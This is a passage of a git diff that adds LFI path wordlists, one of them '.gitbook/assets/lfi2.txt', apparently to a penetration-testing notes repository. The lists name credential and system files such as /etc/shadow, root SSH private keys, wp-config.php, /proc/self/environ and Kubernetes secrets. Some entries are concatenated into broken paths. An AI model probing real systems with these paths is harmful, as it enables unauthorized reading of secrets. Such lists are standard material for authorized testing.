+/proc/self/fd/84 +/proc/self/fd/85 +/proc/self/fd/86 +/proc/self/fd/87 +/proc/self/fd/88 +/proc/self/fd/89 +/proc/self/fd/9 +/proc/self/fd/91 +/proc/self/fd/92 +/proc/self/fd/93 +/proc/self/fd/94 +/proc/self/fd/95 +/proc/self/fd/96 +/proc/self/fd/97 +/proc/self/fd/98 +/proc/self/fd/99 +/proc/self/net/arp +/proc/self/stat +/proc/self/status +/proc/self/statvar +/proc/stat +/proc/swaps +~/.profile +/root/anaconda-ks.cfg +/root/.bash_history +/root/.ssh/authorized_hosts +/root/.ssh/authorized_keys +/root/.ssh/id_dsa +/root/.ssh/id_rsa +/root/.ssh/known_hosts +~/.ssh/authorized_keys +~/.ssh/id_dsa +~/.ssh/id_dsa.pub +~/.ssh/identity +~/.ssh/identity.pub +~/.ssh/id_rsa +~/.ssh/id_rsa.pub +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/log/error_log +/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.logvar/log/access_log +/usr/local/apache/audit_log +/usr/local/apache/conf/modsec.conf +/usr/local/apache/error.log +/usr/local/apache/error_log +/usr/local/apache/httpd.confusr/local/apache2/httpd.conf +/usr/local/apache/log +/usr/local/apache/log/error_log +/usr/local/apache/logs +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access.logusr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log +/usr/local/cpanel/logs/stats_log +/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log +/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.confetc/php.ini +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/lib/php.iniusr/local/php/lib/php.ini +/usr/local/php5/httpd.conf.php +/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.ini +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl +/usr/local/pureftpd/etc/pureftpd.pdn +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/httpd_log +/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ +/usr/ports/net/pure-ftpd/ +/usr/sbin/pure-config.pl +/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf +/usr/var/lib/mysql/debian.cnf +/usr/var/lib/mysql/my.cnf +/usr/var/lib/mysql/user.MYD +/var/apache2/config.inc +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/htmp +/var/lib/mysql/debian.cnf +/var/lib/mysql/mysql/user.MYD +/var/lib/mysql/user.MYD +/var/local/www/conf/php.ini +/var/local/www/conf/php.inietc/php/cgi/php.ini +/var/log/access.log +/var/log/apache2/access_log +/var/log/apache2/access_logvar/log/httpd/error_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache/access_log +/var/log/apache/error_log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth.log +/var/log/boot +/var/log/chttp.log +/var/log/cron.logvar/log/couchdb/couch.log +/var/log/cups/error.log +/var/log/daemon.log +/var/log/debug +/var/log/dmesg +/var/log/dmessage +/var/log/dpkg.log +/var/log/error_log +/var/log/error.logvar/log/apache/access_log +/var/log/exim4/mainlog +/var/log/exim4_mainlog +/var/log/exim4/paniclog +/var/log/exim/mainlog +/var/log/exim/mainlogvar/log/maillog +/var/log/exim.paniclog +/var/log/exim/paniclog +/var/log/faillog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd/access.log +/var/log/lighttpd/error.log +/var/log/lighttpd/lighttpd.access.log +/var/log/lighttpd/lighttpd.error.log +/var/log/mail.info +/var/log/maillog +/var/log/mail.warn +/var/log/message +/var/log/mysqlderror.log +/var/log/mysqlderror.logvar/log/mysql/mysql.log +/var/log/mysql/mysql.log +/var/log/news +/var/log/nginx/access.log +/var/log/nginx/access.logproc/self/cmdline +/var/log/nginx/error.log +/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log +/var/log/postgresql/postgresql-9.6-mail.log +/var/log/qmail +/var/log/redis/redis-server.log +/var/log/samba/log.smbd +/var/log/secure +/var/log/smtpd +/var/log/spooler +/var/log/sshd.log +/var/log/syslog +/var/log/telnetd +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/mail/root +/var/run/secrets/kubernetes.io/serviceaccount +/var/run/utmp +/var/webmin/miniserv.log +/var/www/conf/httpd.conf +/var/www/html/wordpress/wp-config.php +/var/www/html/wp/wp-config.php +/var/www/log/access_log +/var/www/log/error_log +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/access_logvar/www/logs/access.log +/var/www/mgr/logs/access.log +/var/www/mgr/logs/error_log +/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log +/var/www/wordpress/wp-config.php +/var/www/wp/wp-config.php +~/.viminfo +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf +/web/conf/php.ini +/WINDOWSphp.ini +/WINNTphp.ini +~/.wm_style +/xamppapachebinphp.ini +/xampp/logs/access_log +~/.Xdefaults +~/.xinitrc +~/.Xresources +~/.xsession \ No newline at end of file diff --git a/.gitbook/assets/lfi2.txt b/.gitbook/assets/lfi2.txt new file mode 100644 index 00000000000..9944f6cd01d --- /dev/null +++ b/.gitbook/assets/lfi2.txt @@ -0,0 +1,1008 @@ +/apache2/logs/access.log +/apache2/logs/error.log +/apache/conf/httpd.conf +/apache/logs/access.log +/apache/logs/error.log +/apache/php/php.ini +/apache\php\php.ini +/bin/php.ini +/boot/grub/grub.cfg +/boot/grub/menu.lst +/etc/adduser.conf +/etc/alias +/etc/apache22/conf/httpd.conf +/etc/apache22/httpd.conf +/etc/apache2/apache2.conf +/etc/apache2/apache.conf +/etc/apache2/conf/httpd.conf +/etc/apache2/default-server.conf +/etc/apache2/envvars +/etc/apache2/httpd2.conf +/etc/apache2/httpd.conf +/etc/apache2/mods-available/autoindex.conf +/etc/apache2/mods-available/deflate.conf +/etc/apache2/mods-available/dir.conf +/etc/apache2/mods-available/mem_cache.conf +/etc/apache2/mods-available/mime.conf +/etc/apache2/mods-available/proxy.conf +/etc/apache2/mods-available/setenvif.conf +/etc/apache2/mods-available/ssl.conf +/etc/apache2/mods-enabled/alias.conf +/etc/apache2/mods-enabled/deflate.conf +/etc/apache2/mods-enabled/dir.conf +/etc/apache2/mods-enabled/mime.conf +/etc/apache2/mods-enabled/negotiation.conf +/etc/apache2/mods-enabled/php5.conf +/etc/apache2/mods-enabled/status.conf +/etc/apache2/ports.conf +/etc/apache2/sites-available/default +/etc/apache2/sites-available/default-ssl +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-enabled/default +/etc/apache2/ssl-global.conf +/etc/apache/access.conf +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/default-server.conf +/etc/apache/httpd.conf +/etc/apt/apt.conf +/etc/avahi/avahi-daemon.conf +/etc/bash.bashrc +/etc/bluetooth/input.conf +/etc/bluetooth/main.conf +/etc/bluetooth/network.conf +/etc/bluetooth/rfcomm.conf +/etc/ca-certificates.conf +/etc/ca-certificates.conf.dpkg-old +/etc/casper.conf +/etc/chkrootkit.conf +/etc/chrootUsers +/etc/clamav/clamd.conf +/etc/clamav/freshclam.conf +/etc/crontab +/etc/crypttab +/etc/cups/acroread.conf +/etc/cups/cupsd.conf +/etc/cups/cupsd.conf.default +/etc/cups/pdftops.conf +/etc/cups/printers.conf +/etc/cvs-cron.conf +/etc/cvs-pserver.conf +/etc/debconf.conf +/etc/debian_version +/etc/default/grub +/etc/deluser.conf +/etc/dhcp3/dhclient.conf +/etc/dhcp3/dhcpd.conf +/etc/dhcp/dhclient.conf +/etc/dns2tcpd.conf +/etc/e2fsck.conf +/etc/esound/esd.conf +/etc/etter.conf +/etc/exports +/etc/fedora-release +/etc/firewall.rules +/etc/foremost.conf +/etc/fstab +/etc/ftpchroot +/etc/ftphosts +/etc/ftpusers +/etc/fuse.conf +/etc/group +/etc/group- +/etc/hdparm.conf +/etc/host.conf +/etc/hostname +/etc/hosts +/etc/hosts.allow +/etc/hosts.deny +/etc/http/conf/httpd.conf +/etc/httpd/apache2.conf +/etc/httpd/apache.conf +/etc/httpd.conf +/etc/httpd/conf +/etc/httpd/conf/apache2.conf +/etc/httpd/conf/apache.conf +/etc/httpd/conf.d +/etc/httpd/conf/httpd.conf +/etc/httpd/extra/httpd-ssl.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/acces.log +/etc/httpd/logs/acces_log +/etc/httpd/logs/access.log +/etc/httpd/logs/access_log +/etc/httpd/logs/error.log +/etc/httpd/logs/error_log +/etc/httpd/mod_php.conf +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf +/etc/init.d +/etc/inittab +/etc/ipfw.conf +/etc/ipfw.rules +/etc/issue +/etc/issue.net +/etc/kbd/config +/etc/kernel-img.conf +/etc/kernel-pkg.conf +/etc/ldap/ldap.conf +/etc/ld.so.conf +/etc/lighttpd/lighthttpd.conf +/etc/login.defs +/etc/logrotate.conf +/etc/ltrace.conf +/etc/mail/sendmail.conf +/etc/mandrake-release +/etc/manpath.config +/etc/miredo.conf +/etc/miredo/miredo.conf +/etc/miredo/miredo-server.conf +/etc/miredo-server.conf +/etc/modules +/etc/mono/config +/etc/motd +/etc/mtab +/etc/mtools.conf +/etc/muddleftpd.com +/etc/muddleftpd/muddleftpd.conf +/etc/muddleftpd/muddleftpd.passwd +/etc/muddleftpd/mudlog +/etc/muddleftpd/mudlogd.conf +/etc/muddleftpd/passwd +/etc/my.cnf +/etc/mysql/my.cnf +/etc/networks +/etc/nginx/nginx.conf +/etc/openldap/ldap.conf +/etc/os-release +/etc/osxhttpd/osxhttpd.conf +/etc/pam.conf +/etc/passwd +/etc/passwd- +/etc/passwd~ +/etc/password.master +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/phpmyadmin/config.inc.php +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/postgresql/pg_hba.conf +/etc/postgresql/postgresql.conf +/etc/profile +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pulse/client.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/rc.conf +/etc/redhat-release +/etc/resolv.conf +/etc/samba/dhcp.conf +/etc/samba/netlogon +/etc/samba/private/smbpasswd +/etc/samba/samba.conf +/etc/samba/smb.conf +/etc/samba/smb.conf.user +/etc/samba/smbpasswd +/etc/samba/smbusers +/etc/security/access.conf +/etc/security/environ +/etc/security/failedlogin +/etc/security/group +/etc/security/group.conf +/etc/security/lastlog +/etc/security/limits +/etc/security/limits.conf +/etc/security/namespace.conf +/etc/security/opasswd +/etc/security/pam_env.conf +/etc/security/passwd +/etc/security/passwd +/etc/security/sepermit.conf +/etc/security/time.conf +/etc/security/user +/etc/sensors3.conf +/etc/sensors.conf +/etc/shadow +/etc/shadow- +/etc/shadow~ +/etc/slackware-release +/etc/smb.conf +/etc/smbpasswd +/etc/smi.conf +/etc/squirrelmail/apache.conf +/etc/squirrelmail/config/config.php +/etc/squirrelmail/config_default.php +/etc/squirrelmail/config_local.php +/etc/squirrelmail/config.php +/etc/squirrelmail/default_pref +/etc/squirrelmail/filters_setup.php +/etc/squirrelmail/index.php +/etc/squirrelmail/sqspell_config.php +/etc/ssh/sshd_config +/etc/sso/sso_config.ini +/etc/stunnel/stunnel.conf +/etc/sudoers +/etc/SUSE-release +/etc/sysconfig/network-scripts/ifcfg-eth0 +/etc/sysctl.conf +/etc/syslog.conf +/etc/timezone +/etc/tinyproxy/tinyproxy.conf +/etc/tor/tor-tsocks.conf +/etc/tsocks.conf +/etc/updatedb.conf +/etc/updatedb.conf.BeforeVMwareToolsInstall +/etc/utmp +/etc/vhcs2/proftpd/proftpd.conf +/etc/vmware-tools/config +/etc/vmware-tools/tpvmlp.conf +/etc/vmware-tools/vmware-tools-libraries.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/webmin/miniserv.conf +/etc/webmin/miniserv.users +/etc/wicd/dhclient.conf.template.default +/etc/wicd/manager-settings.conf +/etc/wicd/wired-settings.conf +/etc/wicd/wireless-settings.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/etc/X11/xorg.conf +/etc/X11/xorg.conf.BeforeVMwareToolsInstall +/etc/X11/xorg.conf.orig +/etc/X11/xorg.conf-vesa +/etc/X11/xorg.conf-vmware +/home2/bin/stable/apache/php.ini +/home2\bin\stable\apache\php.ini +/home/bin/stable/apache/php.ini +/home\bin\stable\apache\php.ini +/home/postgres/data/pg_hba.conf +/home/postgres/data/pg_ident.conf +/home/postgres/data/PG_VERSION +/home/postgres/data/postgresql.conf +/home/user/lighttpd/lighttpd.conf +/http/httpd.conf +/[JBOSS]/server/default/conf/jboss-minimal.xml +/[JBOSS]/server/default/conf/jboss-service.xml +/[JBOSS]/server/default/conf/jndi.properties +/[JBOSS]/server/default/conf/log4j.xml +/[JBOSS]/server/default/conf/login-config.xml +/[JBOSS]/server/default/conf/server.log.properties +/[JBOSS]/server/default/conf/standardjaws.xml +/[JBOSS]/server/default/conf/standardjboss.xml +/[JBOSS]/server/default/deploy/jboss-logging.xml +/[JBOSS]/server/default/log/boot.log +/[JBOSS]/server/default/log/server.log +/Library/WebServer/Documents/default.htm +/Library/WebServer/Documents/default.html +/Library/WebServer/Documents/default.php +/Library/WebServer/Documents/.htaccess +/Library/WebServer/Documents/index.htm +/Library/WebServer/Documents/index.html +/Library/WebServer/Documents/index.php +/logs/access.log +/logs/access_log +/logs/error.log +/logs/error_log +/logs/pure-ftpd.log +/logs/security_debug_log +/logs/security_log +/mysql/bin/my.ini +/MySQL/data/{HOST}.err +/MySQL/data/mysql-bin.index +/MySQL/data/mysql-bin.log +/MySQL/data/mysql.err +/MySQL/data/mysql.log +/MySQL/my.cnf +/MySQL/my.ini +/NetServer/bin/stable/apache/php.ini +/NetServer\bin\stable\apache\php.ini +/opt/apache22/conf/httpd.conf +/opt/apache2/apache2.conf +/opt/apache2/apache.conf +/opt/apache2/conf/apache2.conf +/opt/apache2/conf/apache.conf +/opt/apache2/conf/httpd.conf +/opt/apache/apache2.conf +/opt/apache/apache.conf +/opt/apache/conf/apache2.conf +/opt/apache/conf/apache.conf +/opt/apache/conf/httpd.conf +/opt/httpd/apache2.conf +/opt/httpd/apache.conf +/opt/httpd/conf/apache2.conf +/opt/httpd/conf/apache.conf +/opt/[JBOSS]/server/default/conf/jboss-minimal.xml +/opt/[JBOSS]/server/default/conf/jboss-service.xml +/opt/[JBOSS]/server/default/conf/jndi.properties +/opt/[JBOSS]/server/default/conf/log4j.xml +/opt/[JBOSS]/server/default/conf/login-config.xml +/opt/[JBOSS]/server/default/conf/server.log.properties +/opt/[JBOSS]/server/default/conf/standardjaws.xml +/opt/[JBOSS]/server/default/conf/standardjboss.xml +/opt/[JBOSS]/server/default/deploy/jboss-logging.xml +/opt/[JBOSS]/server/default/log/boot.log +/opt/[JBOSS]/server/default/log/server.log +/opt/lampp/etc/httpd.conf +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error.log +/opt/lampp/logs/error_log +/opt/lsws/conf/httpd_conf.xml +/opt/lsws/logs/access.log +/opt/lsws/logs/error.log +/opt/tomcat/logs/catalina.err +/opt/tomcat/logs/catalina.out +/opt/xampp/etc/php.ini +/opt/xampp/logs/access.log +/opt/xampp/logs/access_log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log +/private/etc/httpd/apache2.conf +/private/etc/httpd/apache.conf +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/private/etc/squirrelmail/config/config.php +/private/tmp/[JBOSS]/server/default/conf/jboss-minimal.xml +/private/tmp/[JBOSS]/server/default/conf/jboss-service.xml +/private/tmp/[JBOSS]/server/default/conf/jndi.properties +/private/tmp/[JBOSS]/server/default/conf/log4j.xml +/private/tmp/[JBOSS]/server/default/conf/login-config.xml +/private/tmp/[JBOSS]/server/default/conf/server.log.properties +/private/tmp/[JBOSS]/server/default/conf/standardjaws.xml +/private/tmp/[JBOSS]/server/default/conf/standardjboss.xml +/private/tmp/[JBOSS]/server/default/deploy/jboss-logging.xml +/private/tmp/[JBOSS]/server/default/log/boot.log +/private/tmp/[JBOSS]/server/default/log/server.log +/proc/cpuinfo +/proc/devices +/proc/meminfo +/proc/net/tcp +/proc/net/udp +/proc/self/cmdline +/proc/self/environ +/proc/self/mounts +/proc/self/stat +/proc/self/status +/proc/version +/Program Files/Apache Group/Apache2/conf/apache2.conf +/Program Files/Apache Group/Apache2/conf/apache.conf +/Program Files/Apache Group/Apache2/conf/httpd.conf +/Program Files\Apache Group\Apache2\conf\httpd.conf +/Program Files/Apache Group/Apache/apache2.conf +/Program Files/Apache Group/Apache/apache.conf +/Program Files/Apache Group/Apache/conf/apache2.conf +/Program Files/Apache Group/Apache/conf/apache.conf +/Program Files/Apache Group/Apache/conf/httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files/Apache Group/Apache/logs/access.log +/Program Files\Apache Group\Apache\logs\access.log +/Program Files/Apache Group/Apache/logs/error.log +/Program Files\Apache Group\Apache\logs\error.log +/Program Files/[JBOSS]/server/default/conf/jboss-minimal.xml +/Program Files/[JBOSS]/server/default/conf/jboss-service.xml +/Program Files/[JBOSS]/server/default/conf/jndi.properties +/Program Files/[JBOSS]/server/default/conf/log4j.xml +/Program Files/[JBOSS]/server/default/conf/login-config.xml +/Program Files/[JBOSS]/server/default/conf/server.log.properties +/Program Files/[JBOSS]/server/default/conf/standardjaws.xml +/Program Files/[JBOSS]/server/default/conf/standardjboss.xml +/Program Files/[JBOSS]/server/default/deploy/jboss-logging.xml +/Program Files/[JBOSS]/server/default/log/boot.log +/Program Files/[JBOSS]/server/default/log/server.log +/Program Files/MySQL/data/{HOST}.err +/Program Files/MySQL/data/mysql-bin.index +/Program Files/MySQL/data/mysql-bin.log +/Program Files/MySQL/data/mysql.err +/Program Files/MySQL/data/mysql.log +/Program Files/MySQL/my.cnf +/Program Files/MySQL/my.ini +/Program Files/Vidalia Bundle/Polipo/polipo.conf +/Program Files/xampp/apache/conf/apache2.conf +/Program Files/xampp/apache/conf/apache.conf +/Program Files/xampp/apache/conf/httpd.conf +/Program Files\xampp\apache\conf\httpd.conf +/root/.bash_config +/root/.bash_history +/root/.bash_logout +/root/.bashrc +/root/.ksh_history +/root/.Xauthority +/srv/www/htdos/squirrelmail/config/config.php +/tmp/access.log +/tmp/[JBOSS]/server/default/conf/jboss-minimal.xml +/tmp/[JBOSS]/server/default/conf/jboss-service.xml +/tmp/[JBOSS]/server/default/conf/jndi.properties +/tmp/[JBOSS]/server/default/conf/log4j.xml +/tmp/[JBOSS]/server/default/conf/login-config.xml +/tmp/[JBOSS]/server/default/conf/server.log.properties +/tmp/[JBOSS]/server/default/conf/standardjaws.xml +/tmp/[JBOSS]/server/default/conf/standardjboss.xml +/tmp/[JBOSS]/server/default/deploy/jboss-logging.xml +/tmp/[JBOSS]/server/default/log/boot.log +/tmp/[JBOSS]/server/default/log/server.log +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/home/user/lighttpd/lighttpd.conf +/usr/home/user/var/log/apache.log +/usr/home/user/var/log/lighttpd.error.log +/usr/internet/pgsql/data/pg_hba.conf +/usr/internet/pgsql/data/postmaster.log +/usr/lib/cron/log +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache22/conf/httpd.conf +/usr/local/apache22/httpd.conf +/usr/local/apache2/apache2.conf +/usr/local/apache2/apache.conf +/usr/local/apache2/conf/apache2.conf +/usr/local/apache2/conf/apache.conf +/usr/local/apache2/conf/extra/httpd-ssl.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/conf/modsec.conf +/usr/local/apache2/conf/ssl.conf +/usr/local/apache2/conf/vhosts.conf +/usr/local/apache2/conf/vhosts-custom.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/audit_log +/usr/local/apache2/logs/error.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/lighttpd.error.log +/usr/local/apache2/logs/lighttpd.log +/usr/local/apache/apache2.conf +/usr/local/apache/apache.conf +/usr/local/apache/conf/access.conf +/usr/local/apache/conf/apache2.conf +/usr/local/apache/conf/apache.conf +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/httpd.conf.default +/usr/local/apache/conf/modsec.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/conf/vhosts.conf +/usr/local/apache/conf/vhosts-custom.conf +/usr/local/apache/httpd.conf +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access_log +/usr/local/apache/logs/audit_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/lighttpd.error.log +/usr/local/apache/logs/lighttpd.log +/usr/local/apache/logs/mod_jk.log +/usr/local/apps/apache22/conf/httpd.conf +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/apache22/conf/httpd.conf +/usr/local/etc/apache22/httpd.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache2/httpd.conf +/usr/local/etc/apache2/vhosts.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/httpd/conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/lighttpd.conf +/usr/local/etc/lighttpd.conf.new +/usr/local/etc/nginx/nginx.conf +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/etc/smb.conf +/usr/local/etc/webmin/miniserv.conf +/usr/local/etc/webmin/miniserv.users +/usr/local/httpd/conf/httpd.conf +/usr/local/jakarta/dist/tomcat/conf/context.xml +/usr/local/jakarta/dist/tomcat/conf/jakarta.conf +/usr/local/jakarta/dist/tomcat/conf/logging.properties +/usr/local/jakarta/dist/tomcat/conf/server.xml +/usr/local/jakarta/dist/tomcat/conf/workers.properties +/usr/local/jakarta/dist/tomcat/logs/mod_jk.log +/usr/local/jakarta/tomcat/conf/context.xml +/usr/local/jakarta/tomcat/conf/jakarta.conf +/usr/local/jakarta/tomcat/conf/logging.properties +/usr/local/jakarta/tomcat/conf/server.xml +/usr/local/jakarta/tomcat/conf/workers.properties +/usr/local/jakarta/tomcat/logs/catalina.err +/usr/local/jakarta/tomcat/logs/catalina.out +/usr/local/jakarta/tomcat/logs/mod_jk.log +/usr/local/[JBOSS]/server/default/conf/jboss-minimal.xml +/usr/local/[JBOSS]/server/default/conf/jboss-service.xml +/usr/local/[JBOSS]/server/default/conf/jndi.properties +/usr/local/[JBOSS]/server/default/conf/log4j.xml +/usr/local/[JBOSS]/server/default/conf/login-config.xml +/usr/local/[JBOSS]/server/default/conf/server.log.properties +/usr/local/[JBOSS]/server/default/conf/standardjaws.xml +/usr/local/[JBOSS]/server/default/conf/standardjboss.xml +/usr/local/[JBOSS]/server/default/deploy/jboss-logging.xml +/usr/local/[JBOSS]/server/default/log/boot.log +/usr/local/[JBOSS]/server/default/log/server.log +/usr/local/lib/php.ini +/usr/local/lighttpd/conf/lighttpd.conf +/usr/local/lighttpd/log/access.log +/usr/local/lighttpd/log/lighttpd.error.log +/usr/local/logs/access.log +/usr/local/logs/samba.log +/usr/local/lsws/conf/httpd_conf.xml +/usr/local/lsws/logs/error.log +/usr/local/mysql/data/{HOST}.err +/usr/local/mysql/data/mysql-bin.index +/usr/local/mysql/data/mysql-bin.log +/usr/local/mysql/data/mysqlderror.log +/usr/local/mysql/data/mysql.err +/usr/local/mysql/data/mysql.log +/usr/local/mysql/data/mysql-slow.log +/usr/local/nginx/conf/nginx.conf +/usr/local/pgsql/bin/pg_passwd +/usr/local/pgsql/data/passwd +/usr/local/pgsql/data/pg_hba.conf +/usr/local/pgsql/data/pg_log +/usr/local/pgsql/data/postgresql.conf +/usr/local/pgsql/data/postgresql.log +/usr/local/php4/apache2.conf +/usr/local/php4/apache2.conf.php +/usr/local/php4/apache.conf +/usr/local/php4/apache.conf.php +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/apache2.conf +/usr/local/php5/apache2.conf.php +/usr/local/php5/apache.conf +/usr/local/php5/apache.conf.php +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/apache2.conf +/usr/local/php/apache2.conf.php +/usr/local/php/apache.conf +/usr/local/php/apache.conf.php +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/psa/admin/conf/php.ini +/usr/local/psa/admin/conf/site_isolation_settings.ini +/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php +/usr/local/psa/admin/logs/httpsd_access_log +/usr/local/psa/admin/logs/panel.log +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/samba/lib/log.user +/usr/local/samba/lib/smb.conf.user +/usr/local/sb/config +/usr/local/Zend/etc/php.ini +/usr/local/zeus/web/global.cfg +/usr/local/zeus/web/log/errors +/usr/pkg/etc/httpd/httpd.conf +/usr/pkg/etc/httpd/httpd-default.conf +/usr/pkg/etc/httpd/httpd-vhosts.conf +/usr/pkgsrc/net/pureftpd/ +/usr/pkgsrc/net/pureftpd/pure-ftpd.conf +/usr/pkgsrc/net/pureftpd/pureftpd.passwd +/usr/pkgsrc/net/pureftpd/pureftpd.pdb +/usr/ports/contrib/pure-ftpd/ +/usr/ports/contrib/pure-ftpd/pure-ftpd.conf +/usr/ports/contrib/pure-ftpd/pureftpd.passwd +/usr/ports/contrib/pure-ftpd/pureftpd.pdb +/usr/ports/ftp/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/pure-ftpd.conf +/usr/ports/ftp/pure-ftpd/pureftpd.passwd +/usr/ports/ftp/pure-ftpd/pureftpd.pdb +/usr/ports/net/pure-ftpd/ +/usr/ports/net/pure-ftpd/pure-ftpd.conf +/usr/ports/net/pure-ftpd/pureftpd.passwd +/usr/ports/net/pure-ftpd/pureftpd.pdb +/usr/sbin/mudlogd +/usr/sbin/mudpasswd +/usr/sbin/pure-config.pl +/usr/share/adduser/adduser.conf +/usr/share/logs/catalina.err +/usr/share/logs/catalina.out +/usr/share/squirrelmail/config/config.php +/usr/share/squirrelmail/plugins/squirrel_logger/setup.php +/usr/share/tomcat6/conf/context.xml +/usr/share/tomcat6/conf/logging.properties +/usr/share/tomcat6/conf/server.xml +/usr/share/tomcat6/conf/workers.properties +/usr/share/tomcat6/logs/catalina.err +/usr/share/tomcat6/logs/catalina.out +/usr/share/tomcat/logs/catalina.err +/usr/share/tomcat/logs/catalina.out +/usr/spool/lp/log +/usr/spool/mqueue/syslog +/var/adm/acct/sum/loginlog +/var/adm/aculog +/var/adm/aculogs +/var/adm/crash/unix +/var/adm/crash/vmcore +/var/adm/cron/log +/var/adm/dtmp +/var/adm/lastlog/username +/var/adm/log/asppp.log +/var/adm/loginlog +/var/adm/log/xferlog +/var/adm/lp/lpd-errs +/var/adm/messages +/var/adm/pacct +/var/adm/qacct +/var/adm/ras/bootlog 